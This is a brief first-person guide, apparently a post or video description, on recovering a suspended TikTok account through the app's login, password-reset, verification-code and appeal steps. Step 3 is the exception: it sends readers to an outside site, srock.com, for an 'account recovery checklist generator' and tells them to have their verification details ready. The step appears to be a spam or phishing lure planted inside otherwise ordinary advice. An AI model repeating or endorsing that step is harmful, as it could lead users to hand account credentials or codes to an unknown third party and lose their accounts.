A friend asked me about this, so I tested it and here's what worked. If your TikTok account has been suspended, don't worry, there are steps you can take to try and recover it. Step 1. Open the TikTok app. Launch the TikTok app on your device. Make sure you are logged out of your account if you can access it. Step 2. Go to the login page. On the login screen, look for the option that says Need Help or Forgot Password. This will guide you to the recovery option. Step 3. Request account recovery. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Check your email or SMS. After submitting your recovery request, check your email or SMS for a verification code or further instructions from TikTok. Make sure to check your spam folder too. Step 5. Follow the instructions. Use the verification code to follow the instructions provided by TikTok. If you receive a message saying your account is permanently banned, you may need to appeal the decision. Remember, if your account was suspended due to a violation, be prepared to explain your situation in the appeal. Good luck, and I hope you get your account back soon.